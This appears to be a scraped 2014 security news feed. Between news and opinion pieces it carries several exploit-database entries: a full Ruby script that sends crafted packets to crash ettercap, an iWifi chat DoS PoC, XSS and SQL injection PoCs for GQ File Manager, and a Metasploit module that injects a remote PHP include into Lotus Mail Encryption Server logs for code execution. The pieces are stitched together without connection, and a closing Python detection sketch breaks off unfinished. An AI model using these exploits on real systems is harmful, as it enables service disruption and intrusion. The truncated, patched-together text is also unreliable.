Apple is updating its Macs to guard against hackers taking control -- the first time a Mac update has been sent out automatically without requiring your permission. The automated security update protects Apple laptops and desktops from the newly discovered security vulnerability CVE-2014-9295, which affects OS X as well as Linux and Unix distributions. Speaking to Reuters, Apple spokesperson Bill Evans described Monday's update as "seamless" and noted that Mac users don't even need to restart their computers. Apple isn't the only company that could be vulnerable to the security bug, which was revealed Friday by the US Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. Researchers warn that vulnerabilities in a computer's network time protocol (NTP) implementation, which syncs a computer's clock, could allow hackers to take control of a computer remotely. "Apple's proactive steps to automatically remediate this particular vulnerability shows the need to quickly patch remotely exploitable vulnerabilities," says security analyst Ken Westin of Tripwire. "However, the use of Apple's automatic deployment tool is not without risks, as even the simplest update can cause problems for some systems. In this case the update may have been so minor the risk of affecting other applications and processes was minimal." Previously, Apple's security updates have required a computer user to accept the update. The company has actually had a method to automatically update computers for two years but is only now using it for the first time. What if someone doesn't want automatic updates? Westin advises: "If you have a Mac system where an automatic update might introduce a problem -- or you are the paranoid type -- it can be disabled by going to the Apple Menu > System Preferences > App Store and unchecking Install system data files and security updates." Source
-
Document Title:
===============
iWifi for Chat v1.1 iOS - Denial of Service Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1375

Release Date:
=============
2014-12-16

Vulnerability Laboratory ID (VL-ID):
====================================
1376

Common Vulnerability Scoring System:
====================================
4.6

Product & Service Introduction:
===============================
iWifi for Chat lets you easily chat with your friends over Wifi in a fast and reliable way. The app is part of a bundle and is made by the seller ios developer.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/iwifi-for-chat/id512703175 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a remote denial of service vulnerability in the iWifi for Chat v1.1 iOS web-application.

Vulnerability Disclosure Timeline:
==================================
2014-12-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
iOS Developer
Product: iWifi for Chat - iOS Web Application 1.1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A remote denial of service vulnerability has been discovered in the official iWifi for Chat v1.1 iOS web-application. The vulnerability allows remote attackers to shut down the service application by sending a specially crafted chat message. The vulnerability is located in the application message input context. Remote attackers are able to inject special chars to provoke an error that results in an app shutdown. The bug can be exploited by sending specially crafted symbol messages through the context message input box. The vulnerability allows an attacker to crash the connected remote iOS client.

The security risk of the denial of service vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 4.6. Exploitation of the DoS vulnerability requires no privileged application user account but a connected chat user for interaction. Successful exploitation of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise.

Vulnerable Module(s):
[+] Chat Message Input Box

Vulnerable Parameter(s):
[+] message context

Affected Module(s):
[+] iWifi for Chat v1.1

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or a privileged application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: 1024 bytes - message context payload
?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬?????????????? ???????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬???????

PoC: Exploit
#!/usr/local/bin/perl
open (MYFILE, '>>exploitcode.txt');
print MYFILE "?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????????¬?????????????????-????????????????????????????? ¬??????????????¬??????????????????????????????¬¬ ?????????????????????????????¬? ?¬??????? -??????????????????????¬????????¬?????????????????????¬?????????-??????? ?????????????¬??????????¬???????????????????¬??????????? ¬??????????????????¬???? ????¬??????? -??????????????????????¬???????\n";
close (MYFILE);

Security Risk:
==============
The security risk of the denial of service web vulnerability is estimated as medium. (CVSS 4.6)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source
-
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packetfu and pcaprub

require 'packetfu'
include PacketFu

if ARGV.count < 4
  puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
  puts "[-]Use valid mac for your interface, if you dont know"+
       " victim's ip address use broadcast"
  exit
end

# NBNS query with an oversized name section (nbns plugin, CVE-2014-9377)
def nbns_header
  u = UDPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_daddr = ARGV[1]
  u.ip_saddr = ARGV[0]
  u.udp_src = 4444
  u.udp_dst = 137
  u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
  u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
  u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
  u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
  u.payload << "\x00\x20" #type
  u.payload << "\x00\x01" #class
  u.payload << "A"*1000 #pad
  u.recalc
  u.to_w(ARGV[3])
end

# Gadu-Gadu client packet whose declared length disagrees with its body (gg dissector, CVE-2014-9376)
def gg_client
  u = TCPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_saddr = ARGV[0]
  u.ip_daddr = ARGV[1]
  u.tcp_src = 3333
  u.tcp_dst = 8074
  u.payload = "\x15\x00\x00\x00" #gg_type
  u.payload << "\xe8\x03\x00\x00" #gg_len
  u.payload << "A"*1000
  u.recalc
  u.to_w(ARGV[3])
end

# DHCP reply with a zero-length option (dhcp dissector, CVE-2014-9376)
def dhcp_header
  u = UDPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_daddr = ARGV[0]
  u.ip_saddr = ARGV[1]
  u.udp_src = 67
  u.udp_dst = 4444
  u.payload = "\x02"*236
  u.payload << "\x63\x82\x53\x63"
  u.payload << "\x35"
  u.payload << "\x00\x05\x00"
  u.payload << "\x51"
  u.payload << "\x00" #size
  u.payload << "A" * 3 #pad
  u.recalc
  u.to_w(ARGV[3])
end

# Well-formed mDNS query that primes the plugin before the malformed one (mdns plugin, CVE-2014-9378)
def mdns_header
  u = UDPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_daddr = ARGV[1]
  u.ip_saddr = ARGV[0]
  u.udp_src = 4444
  u.udp_dst = 5353
  u.payload = "\x11\x11" #id
  u.payload << "\x00\x00" #flags
  u.payload << "\x00\x01" #questions
  u.payload << "\x00\x00" #answer_rr
  u.payload << "\x00\x00" #auth_rrs
  u.payload << "\x00\x00" #additional_rr
  u.payload << "\x06router\x05local\x00" #name
  u.payload << "\x00\x01" #type
  u.payload << "\x00\x01" #class
  u.recalc
  u.to_w(ARGV[3])
end

# mDNS query with a truncated name label followed by padding (mdns plugin, CVE-2014-9378)
def mdns_dos_header
  u = UDPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_daddr = ARGV[1]
  u.ip_saddr = ARGV[0]
  u.udp_src = 4444
  u.udp_dst = 5353
  u.payload = "\x11\x11" #id
  u.payload << "\x00\x00" #flags
  u.payload << "\x00\x01" #questions
  u.payload << "\x00\x00" #answer_rr
  u.payload << "\x00\x00" #auth_rrs
  u.payload << "\x00\x00" #additional_rr
  u.payload << "\x01"
  u.payload << "\x00\x01" #type
  u.payload << "\x00\x01" #class
  u.payload << "A"*500
  u.recalc
  u.to_w(ARGV[3])
end

# PostgreSQL server-side authentication request (postgresql dissector, CVE-2014-6395)
def pgsql_server
  u = TCPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_saddr = ARGV[1]
  u.ip_daddr = ARGV[0]
  u.tcp_src = 5432
  u.tcp_dst = 3333
  u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  u.recalc
  u.to_w(ARGV[3])
end

# PostgreSQL client startup message (postgresql dissector, CVE-2014-6395)
def pgsql_client
  u = TCPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_saddr = ARGV[0]
  u.ip_daddr = ARGV[1]
  u.tcp_src = 3333
  u.tcp_dst = 5432
  u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
  u.recalc
  u.to_w(ARGV[3])
end

# PostgreSQL password message with an oversized length field (postgresql dissector, CVE-2014-6395)
def pgsql_client_shell
  u = TCPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_saddr = ARGV[0]
  u.ip_daddr = ARGV[1]
  u.tcp_src = 3333
  u.tcp_dst = 5432
  u.payload = "\x70"
  u.payload << "\x00\x00\x03\xe9" #len
  u.payload << "A"*1000
  u.payload << "\x00"
  u.recalc
  u.to_w(ARGV[3])
end

# RADIUS access request with inconsistent attribute lengths (radius dissector, CVE-2014-9379)
def radius_header
  u = UDPPacket.new()
  u.eth_saddr = ARGV[2]
  u.eth_daddr = "ff:ff:ff:ff:ff:ff"
  u.ip_daddr = ARGV[1]
  u.ip_saddr = ARGV[0]
  u.udp_src = 4444
  u.udp_dst = 1645
  u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
  u.recalc
  u.to_w(ARGV[3])
end

puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
choice = $stdin.gets.chomp().to_i()

case choice
when 1
  puts "[+]Sending nbns packet.."
  nbns_header
when 2
  puts "[+]Sending client gg packet.."
  gg_client
when 3
  puts "[+]Sending dhcp packet.."
  dhcp_header
when 4
  puts "[+]Sending mdns packet.."
  mdns_header
  mdns_dos_header
when 5
  puts "[+]Sending pgsql packet.."
  pgsql_client
  pgsql_server
  pgsql_client_shell
when 6
  puts "[+]Sending radius packet.."
  radius_header
else
  puts "[-]Unrecognized command "
end

Source
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerabilities
# Date: 19/12/2014
# Url Vendor: http://installatron.com/phpfilemanager
# Vendor Name: GQ File Manager
# Version: 0.2.5
# CVE: CVE-2014-1137
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High

Description
GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet.

------------------------
+ CROSS SITE SCRIPTING +
------------------------

# Exploiting Description
- Create a new file (for example "xss.html") and insert the XSS code into the document.

Input:
"><img src=x onerror=;;alert('XSS') />

Output:
<br /> <b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br /> "><img src=x onerror=alert("xss");>

#P0c
"><img src=x onerror=;;alert('XSS') />

#Proof Concept
http://i.imgur.com/cjIvR5l.jpg

------------------------
+ Sql Injection +
------------------------

# Exploiting Description
- The SQL injection is in the path parameter used when creating a new file.
#P0c
http://site.com/GQFileManager/index.php?&&output=create&create=[sql]

#Proof Concept
http://i.imgur.com/IJZoDVt.jpg

Source
-
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion',
      'Description'    => %q{
          This module exploits a local file inclusion vulnerability in the Lotus Mail
        Encryption Server (Protector for Mail Encryption) administration setup interface.
        The index.php file uses an unsafe include() where an unauthenticated remote user
        may read (traversal) arbitrary file contents. By abusing a second bug within Lotus,
        we can inject our payload into a known location and call it via the LFI to gain
        remote code execution. Version 2.1.0.1 Build(88.3.0.1.4323) is known to be
        vulnerable. You may need to set DATE in the format YYYY-MM-DD to get this working,
        where the remote host and metasploit instance have UTC timezone differences.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day
          #[ 'CVE', 'X' ],
          [ 'OSVDB', '87556'],
          #[ 'BID', 'X' ],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]],
      'DisclosureDate' => 'Nov 9 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(9000),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']),
      ], self.class)
  end

  def check
    res = send_request_cgi(
    {
      'uri' => '/'
    })
    if (res.code == 302 && res.body.match(/GetLoginScreen.uevent/))
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def php_exploit
    logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d")
    if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore...
      print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.")
      return
    end

    # set up the initial log file RCE - this is unescaped ascii so we can execute it
    # later uid is tomcat so we cannot read apache's logs, and we are stuck inside
    # tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the
    # filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick

    inject_url = "/omc/GetSetupScreen.event?setupPage=<?php+include+'#{php_include_url}';+?>" # no whitespace

    res = send_request_cgi(
    {
      'uri' => inject_url
    })

    if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good.
      vprint_good("Payload injected...")
      response = send_request_cgi(
      {
        'uri'    => '/omc/pme/index.php',
        'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php
      })
    end
  end
end

Source
-
It’s a real bummer when people spend a lot of their money on AAA PC games only to not be able to play them. Major publishers like EA, Activision, and Ubisoft are pushing their own online services, requiring their PC and console games to connect to their servers for any sort of functionality whatsoever. That includes single-player games. Those publishers never seem to have sufficient server capacity to handle the traffic from millions of players executing their games soon after the launch of immensely popular titles. It leads to millions of customers becoming frustrated that they can’t play the games they paid for, many of which were preordered. Developers and publishers say that the “always online” requirement of their new games is to enhance functionality that gamers should appreciate – maybe so, but demanding constant connectivity to their servers is mainly a DRM measure, which is a sloppy way of combating piracy. But that sort of a system penalizes paying consumers a lot more than it inconveniences pirates. My last article focused on that issue. In this article, I’ll explain how poorly designed DRM not only affects gamers, but it also hurts people who legitimately purchase and use applications from two software behemoths: Microsoft and Adobe. Then, I’ll tackle the issue Sony had nearly a decade ago when the DRM on their music CDs was actually vicious rootkit malware. Redmond Goofed The most frequently used components of the Microsoft Office suite have been available for MS-DOS, Windows, and Mac OS since the 1980s. Later on, Microsoft decided to integrate Word, Excel, and PowerPoint into the Microsoft Office suite. The first version for Mac OS debuted in 1989 and for Windows in 1990. A few years later, Word and Excel surpassed competing applications from WordPerfect and Lotus to become the most popular formats for documents and spreadsheets. Microsoft implemented their own special kind of DRM in Office 2003, Information Rights Management. 
IRM is designed to enable people who create documents in Office programs to protect them from unauthorized changes, and from access from unauthorized parties. As some enterprises using Office applications have proprietary information in the files they create, IRM was developed to appeal to them. It’s a wonderful technology, in theory. Until something goes wrong… The function in Microsoft Office that controls IRM is the Rights Management System. RMS controls the IRM that document creators put on their files from Microsoft’s servers, via certificates. On Friday, December 11th, 2009, people who have authorization to use and access IRM-protected documents, including people working for big corporations, received this error message: “Unexpected error occurred. Please try again later or contact your system administrator.” Of course, contacting one’s system administrator would’ve done no good. Considering that the bug affected everyone with IRM-protected documents in Office 2003, it’s reasonable to estimate that corporations lost millions of dollars from lost productivity. So, what went wrong? What was the bug? It was Microsoft’s fault, and they admitted it. They let one of their own certificates expire. Oops! The following day, Saturday, December 12th, Microsoft released a hotfix to correct the issue. But as many corporate offices are closed on the weekend, sysadmins at each affected corporation had to find and implement the hotfix on Monday. Many big businesses had to wait until the end of Monday or Tuesday to acquire access to their crucial documents again. IRM and RMS functionality is also in later versions of Office. And not only does Microsoft have to make sure that their certificates are current, but also if their servers experience any downtime, many more millions of dollars in lost productivity could affect corporations worldwide. Microsoft launched their Office 365 SaaS (software as a service) in 2011, and renewed it for Office 2013 support in 2013. 
With their productivity applications hosted off of Microsoft’s servers, server downtime can prevent corporations from creating new documents and editing existing documents. I wouldn’t recommend Office 365 to anyone. I foresee significant, albeit temporary, information security problems in the future. Microsoft Silverlight is Microsoft’s equivalent to Adobe Flash. It was initially released in 2007. Of course, Microsoft’s own Internet Explorer supported it from the get go, and then support was extended to Mozilla Firefox, Google Chrome, and Apple Safari. A very recent Patch Tuesday (which they now call Update Tuesday, for connoted reasons) broke Silverlight. In the immortal words of Britney Spears, oops, they did it again! Update KB3011970 rendered Silverlight completely unusable. A large percentage of web apps use Silverlight, the web version of Netflix being one of many. The bug that KB3011970 introduced pertained to Silverlight’s DRM. The bug was reported on December 11th, 2014. By December 12th, Microsoft rereleased KB3011970, fixing the DRM bug. I detect a pattern here, which is an intriguing coincidence. Problems on December 11th, fixes on December 12th. Hmmm… Mountain View Goofed Google isn’t the only big Silicon Valley corporation based in Mountain View, California. So is Adobe. Adobe is the industry leader in media creation software. They integrated their graphic editing Photoshop, PDF creation Acrobat, video editing After Effects and Premiere Pro, web developing Dreamweaver and Flash Professional, and a number of other applications into their Adobe Creative Suite. Creative Suite 6, released in 2012, was the last version. Its replacement is Adobe Creative Cloud, a SaaS that initially launched in 2011. I suppose you can figure where this is going. On or before May 14th, 2014, Creative Cloud went down. A lot of corporations and businesses depend on the SaaS, many of whom work in Hollywood. 
Adobe said it was due to a mistake made during a “database maintenance activity.” Ceasing Creative Suite support and shifting to Creative Cloud meant that, like Microsoft with Office 365, Adobe is depending on “always on” connectivity to their servers for the sake of DRM. Editing of Hollywood blockbusters and television shows was halted. Graphic editing for advertising agencies and web developers ceased. Web developers, many of whom were working for the largest corporations, also couldn’t work on their web pages or Flash-based web applications. Software pirates were completely unaffected. So much for the objectives of Digital Rights Management. Just like other stories in this series, DRM implementation was hurting the availability component of the CIA triad of information security. As with Microsoft’s DRM problems, corporations must have lost many millions of dollars due to lost productivity. A full two days later, Adobe tweeted “Adobe ID issue is resolved. We are bringing services back online. We will share more details once we confirm everything is working.” Maybe incidents like that will encourage some corporations to replace Creative Cloud with applications from competing developers. That’s not the only time in 2014 that Adobe’s DRM has caused massive problems for legitimate users. Adobe Digital Editions is ePub and PDF ebook reading software, with significant DRM of its own. Not only is Digital Editions its own desktop ebook reading software, it’s also integrated in Google Play Books, Barnes and Noble Nook ebook readers, and also in ebook readers and tablets from OEMs such as Sony, Acer, HP, and Samsung. Millions of people worldwide use Adobe Digital Editions whether they know it or not, and major publishing houses depend on it to protect their ebook titles. In January 2014, a large number of users experienced problems when Adobe updated their Digital Editions DRM. 
When legitimate users purchased ebooks on their desktop, they weren’t able to read their books on their ebook reader devices the way they’re supposed to. Once again, here’s another case of DRM hurting people who have purchased products, while pirates were unaffected because there’s no such DRM on most ebooks pirated via BitTorrent and other P2P networks. Argh… Remember When Sony Created Malware? On the subject of information security attacks affecting people who properly purchased media, remember when Sony created malware? Sony, of course, is a major player in the music industry, with its own assortment of record labels. Sony was greatly concerned about users putting music CDs into their PCs, ripping the audio content, and pirating it via P2P. So, they put DRM on many of their albums in an effort to prevent such piracy. Sony’s XCP DRM was on CDs they released in 2005. Affected titles include Switchfoot’s Nothing Is Sound, Ricky Martin’s Life, Our Lady Peace’s Healthy in Paranoid Times, Neil Diamond’s 12 Songs, Celine Dion’s On Ne Change Pas, Natasha Bedingfield’s Unwritten, and Amerie’s Touch. XCP was actually rootkit spyware malware. Not only did it allow Sony to spy on your activities, it also made millions of PCs more vulnerable to destructive attacks by blackhats. Trying to remove XCP would break Windows at its very core. When it was discovered, Sony’s Thomas Hesse arrogantly said, “Most people don’t even know what a rootkit is, so why should they care about it?” Even worse, Sony’s initial fix created yet another backdoor vulnerability. Within days, Breplibot trojan malware exploited the attack vector XCP created. Oops, once again. In reaction, F-Secure’s Mikko Hypponen said, “Sony rootkit was one of the seminal moments in malware history. 
Not only did it bring rootkits into public knowledge, it also gave a good lesson to media companies on how not to do their DRM solutions.” Sony and Microsoft eventually fixed the problem, but the cat was out of the bag, and Sony’s image took a major hit. Hopefully they’ve learned their lesson, as has the rest of the music industry. Hopefully… So, in this series, I’ve explained how DRM implementations have created significant problems for corporations and consumers, with a lot of frustration, information security threats, and millions upon millions of dollars lost from our economy — perhaps collective billions from all DRM problems. Instead of hurting pirates, these DRM incidents have hurt paying consumers. In my final article in this series, I’ll talk about developers and services that don’t use DRM at all. Their products should be considered if you want to avoid these sorts of issues from affecting you.
Source
-
US-CERT released a not-so-cryptic advisory this weekend providing enterprises with indicators of compromise and detailed descriptions of the malware used against “a major entertainment company,” the Department of Homeland Security’s description of Sony Pictures Entertainment. DHS describes in great detail a worm capable of moving its way through Windows Server Message Block network shares, conducting brute-force password attacks against protected network shares before dropping five other components, including destructive disk-crushing wiper malware. The advisory was finalized on Saturday, less than a day after the FBI officially pinned the blame for the attack on North Korea and President Barack Obama, during a year-end news conference, said Sony made a mistake in canceling the Christmas Day premiere of the comedy movie The Interview. “Due to the highly destructive functionality of this malware, an organization infected could experience operational impacts including loss of intellectual property and disruption of critical systems,” the US-CERT advisory said. The worm acts as a dropper, leaving behind, according to DHS, a listening implant, a lightweight backdoor, a proxy tool, a destructive hard drive tool, and a destructive target cleaning tool. The worm contains two threads, US-CERT said: the first calls home and sends back log data, while the second attempts to guess passwords on new Windows Server Message Block connections. The worm calls home every five minutes with log data, sending it to one of a handful of command and control servers, and seeks out other SMB shares over port 445. If the brute-force attack works, a file share is established and the malware components are dropped and run on the new host. Sony has been under siege since Nov. 24, when employees were greeted with a message on their workstations and threats from a hacker group calling itself the Guardians of Peace.
Since then, Sony has been subjected to numerous data leaks, from unreleased movies and scripts made available online, to embarrassing email exchanges between executives, to the personal health care and contact information of employees released to Pastebin. Security researchers in the meantime tied samples of the Destover wiper malware used against Sony to the Shamoon attack against Saudi Aramco and the DarkSeoul attacks against financial institutions and media outlets in South Korea. The links between the attacks against Sony and the previous two attacks were solid, said Kaspersky Lab researcher Kurt Baumgartner, who noted similarities in the use of the commercially available Eldos RawDisk driver files in the Shamoon and Destover attacks. He also said that wiper drivers are maintained in the dropper’s resource section (in Shamoon and Destover), and disk data and the MBR are overwritten with encoded political messages (Shamoon and DarkSeoul). While Shamoon has been linked to Iran, DarkSeoul was tied to North Korea, and it didn’t take long for investigators to make the same connection with Destover, despite doses of skepticism from security experts. The DHS advisory is the first deep dive into the malware components left behind by the dropper, including the two wiper components, one of which destroys hard drive data on the first four physical drives it encounters as well as the master boot record, with an additional program designed to do further damage if a machine is rebooted. If a user has only user-level privileges rather than admin-level, the amount of damage is lessened. The advisory also provides insight into the backdoor, which can move files, gather system information, manipulate processes, and perform remote and command-line code execution.
“This tool includes functionality to open ports in a victim host’s firewall and take advantage of universal Plug and Play (UPNP) mechanisms to discover routers and gateway devices, and add port mappings, allowing inbound connections to victim hosts on Network Address Translated (NAT) private networks,” the advisory said. “There are no callback domains associated with this malware since connections are inbound only on a specified port number.” In addition to IOCs, the DHS advisory also contains a list of seven command and control servers located in Thailand, Poland, Italy, Bolivia, Singapore, Cyprus and the United States. Source
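A defender-side sketch of how the two behaviours the advisory describes above (the call-home every five minutes and the SMB brute-force spread over port 445) could be flagged in connection logs, as an added example that is not part of the advisory or the article; the flow-record format, the thresholds and the sample addresses are assumptions.

```python
"""Detect two behaviours the advisory attributes to the worm: a beacon every
five minutes and SMB (TCP/445) fan-out to many hosts. Added example, not
code from US-CERT or Threatpost; record format and thresholds are assumed."""
from collections import defaultdict
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S"

def find_beacons(flows, period=300, tolerance=10, min_gaps=3):
    """(src, dst, port) whose consecutive gaps hit period +/- tolerance >= min_gaps times."""
    by_peer = defaultdict(list)
    for ts, src, dst, port in flows:
        by_peer[(src, dst, port)].append(datetime.strptime(ts, FMT))
    hits = set()
    for peer, times in by_peer.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if sum(abs(g - period) <= tolerance for g in gaps) >= min_gaps:
            hits.add(peer)
    return hits

def find_smb_fanout(flows, window=600, min_targets=3):
    """Sources reaching >= min_targets distinct hosts on 445 within any window seconds."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        if port == 445:
            by_src[src].append((datetime.strptime(ts, FMT), dst))
    hits = set()
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            seen = {d for t, d in events[i:] if (t - t0).total_seconds() <= window}
            if len(seen) >= min_targets:
                hits.add(src)
                break
    return hits

# Constructed flow records (timestamp, src, dst, dst_port); not real traffic.
FLOWS = [
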